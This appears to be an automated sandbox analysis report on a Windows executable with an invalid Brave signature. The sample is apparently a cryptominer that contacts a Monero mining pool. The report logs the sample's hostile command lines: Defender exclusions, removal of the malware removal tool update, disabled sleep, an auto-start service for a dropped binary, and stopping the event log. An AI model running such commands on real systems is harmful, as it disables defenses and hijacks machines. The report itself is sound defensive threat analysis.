                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1510207563435464
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulvX/Z:NllUvX
                                                                MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                                                SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                                                SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                                                SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):14544
                                                                Entropy (8bit):6.2660301556221185
                                                                Encrypted:false
                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View (other analyses in which this dropped file was seen):
• Filename: 1mqzOM6eok.exe, Detection: malicious
• Filename: updater.exe, Detection: malicious
• Filename: 7QiAmg58Jk.exe, Detection: malicious
• Filename: LnK0dS8jcA.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: S0FTWARE.exe, Detection: malicious
• Filename: Gw2G72kSsY.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Entropy (8bit):6.559876563234829
                                                                TrID:
                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:aA45th2ixY.exe
                                                                File size:2'684'712 bytes
                                                                MD5:6694e88cd0b76e774385e450b3027f35
                                                                SHA1:5049c878bbbbfbeee9a38489086cb77a94c8f663
                                                                SHA256:40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e
                                                                SHA512:b404e98f602fa09d22b08065af32feacbe8c96c9dbf677e50bb420cd80cb217864a1564f7a931fc747e78aeff3691ea1e6d3a58acfdddfaa234e21d5b43c14fd
                                                                SSDEEP:49152:3GP12M443HsaixDif+GwpQ0WoIujEmXZpD3F93lRg7OE+Goqe1HFl:2m6HsaCDifuZW1cEIpZ93l3EylPl
                                                                TLSH:60C53344E66773FAE202803C5E4B4EA41450EA83E718D5E7DFDEB1691F316C2B578A83
                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......z....(.....@..........@..............................)...........`........................................
                                                                Icon Hash:2f232d67b7934633
                                                                Entrypoint:0x140001140
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x140000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6702ECD2 [Sun Oct 6 20:02:26 2024 UTC]
                                                                TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:de41d4e0545d977de6ca665131bb479a
                                                                Signature Valid:false
                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
Not Before: 28/05/2024 01:00:00
Not After: 07/08/2027 00:59:59
Subject Chain:
• CN="Brave Software, Inc.", O="Brave Software, Inc.", L=San Francisco, S=California, C=US
                                                                Version:3
                                                                Thumbprint MD5:9556B0EC482251182975F452FB6EFFBC
                                                                Thumbprint SHA-1:F8AC5F11DE7E26383B7A389FC19A2613835799D7
                                                                Thumbprint SHA-256:605F451998D85EFB906F1D062B20DE8BE591F69588C68F0226CE8A64EF27213F
                                                                Serial:0E982FDDF06E93E911065D037D4DD482
                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [00007ED5h]
                                                                mov dword ptr [eax], 00000001h
                                                                call 00007FE02D20A24Fh
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                inc ecx
                                                                push edi
                                                                inc ecx
                                                                push esi
                                                                push esi
                                                                push edi
                                                                push ebx
                                                                dec eax
                                                                sub esp, 20h
                                                                dec eax
                                                                mov eax, dword ptr [00000030h]
                                                                dec eax
                                                                mov edi, dword ptr [eax+08h]
                                                                dec eax
                                                                mov esi, dword ptr [00007EC9h]
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007FE02D20A270h
                                                                dec eax
                                                                cmp edi, eax
                                                                je 00007FE02D20A26Bh
                                                                dec esp
                                                                mov esi, dword ptr [00009691h]
                                                                nop word ptr [eax+eax+00000000h]
                                                                mov ecx, 000003E8h
                                                                inc ecx
                                                                call esi
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007FE02D20A247h
                                                                dec eax
                                                                cmp edi, eax
                                                                jne 00007FE02D20A229h
                                                                dec eax
                                                                mov edi, dword ptr [00007E90h]
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007FE02D20A24Eh
                                                                mov ecx, 0000001Fh
                                                                call 00007FE02D211824h
                                                                jmp 00007FE02D20A269h
                                                                cmp dword ptr [edi], 00000000h
                                                                je 00007FE02D20A24Bh
                                                                mov byte ptr [00287BF9h], 00000001h
                                                                jmp 00007FE02D20A25Bh
                                                                mov dword ptr [edi], 00000001h
                                                                dec eax
                                                                mov ecx, dword ptr [00007E7Ah]
                                                                dec eax
                                                                mov edx, dword ptr [00007E7Bh]
                                                                call 00007FE02D21181Bh
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007FE02D20A25Bh
                                                                dec eax
                                                                mov ecx, dword ptr [00007E50h]
Data directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa560           0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x28d000         0x2920        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x28a000         0x180         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x28ac00         0x4b28
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x290000         0x78          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x90a0           0x28          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x9410           0x138         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xa6f8           0x158         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy              Characteristics
.text   0x1000           0x7936        0x7a00    7f844f0d18857f7d7e2eab8d23f9d60a  False     0.5107261782786885   data                  6.167987156989157    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x9000           0x1ca8        0x1e00    f2e1668034c63ecc2018bff4b19c0fd9  False     0.44453125           zlib compressed data  4.620260658891028    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xb000           0x27ecc0      0x27de00  95c8f148d44b28914e5eb7559800b8cc  unknown   unknown              unknown               unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0x28a000         0x180         0x200     af7ee56e1eb3d632f98b21a0f767758e  False     0.50390625           data                  3.116854587874261    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg  0x28b000         0x10          0x200     b18c7380298e104adf73576fa46bccc1  False     0.04296875           data                  0.15127132530476972  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls    0x28c000         0x10          0x200     bf619eac0cdf3f68d496ea9344137e8b  False     0.02734375           data                  0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x28d000         0x2920        0x2a00    f3287749d7c12227ad106e56ca8e7c3a  False     0.34337797619047616  data                  4.712245111111924    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x290000         0x78          0x200     a814f48e33b52f50f5f1efb22c555aa7  False     0.232421875          data                  1.425440595329436    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources

Name           RVA       Size   Type                                                                                   Language  Country        ZLIB Complexity
RT_ICON        0x28d190  0x128  Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colors    English   United States  0.6317567567567568
RT_ICON        0x28d2b8  0x568  Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors   English   United States  0.5823699421965318
RT_ICON        0x28d820  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colors    English   United States  0.5120967741935484
RT_ICON        0x28db08  0x8a8  Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  English   United States  0.5455776173285198
RT_ICON        0x28e3b0  0x668  Device independent bitmap graphic, 48 x 96 x 4, image size 1536                        English   United States  0.36341463414634145
RT_ICON        0x28ea18  0xea8  Device independent bitmap graphic, 48 x 96 x 8, image size 2688                        English   United States  0.42350746268656714
RT_GROUP_ICON  0x28f8c0  0x5a   data                                                                                   English   United States  0.7333333333333333
DLL | Import
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 01:38:15.549998999 CEST | 49303 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 01:38:15.557410002 CEST | 53 | 49303 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 01:38:15.549998999 CEST | 192.168.2.4 | 1.1.1.1 | 0x3e60 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 162.19.224.121 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 141.94.23.83 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 54.37.232.103 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 146.59.154.106 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 51.89.23.91 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 212.47.253.124 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 51.15.193.130 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 163.172.154.142 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 54.37.137.114 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 01:38:15.557410002 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e60 | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 19:38:07
Start date: 06/10/2024
Path: C:\Users\user\Desktop\aA45th2ixY.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\aA45th2ixY.exe"
Imagebase: 0x7ff6e17d0000
File size: 2'684'712 bytes
MD5 hash: 6694E88CD0B76E774385E450B3027F35
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 19:38:07
Start date: 06/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 19:38:07
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff607da0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase: 0x7ff794000000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase: 0x7ff794000000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 8
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase: 0x7ff794000000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase: 0x7ff794000000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 12
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe delete "OAQXWXCL"
Imagebase: 0x7ff73dcf0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 14
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 19:38:11
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                Target ID:16
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\wusa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff61aa00000
                                                                File size:345'088 bytes
                                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto"
                                                                Imagebase:0x7ff73dcf0000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:19
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                Imagebase:0x7ff73dcf0000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe start "OAQXWXCL"
                                                                Imagebase:0x7ff73dcf0000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:21
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:22
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:19:38:12
                                                                Start date:06/10/2024
                                                                Path:C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
                                                                Imagebase:0x7ff7b9e80000
                                                                File size:2'684'712 bytes
                                                                MD5 hash:6694E88CD0B76E774385E450B3027F35
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 58%, ReversingLabs
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:19:38:12
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:25
                                                                Start time:19:38:12
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:26
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff607da0000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:27
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:28
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:29
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
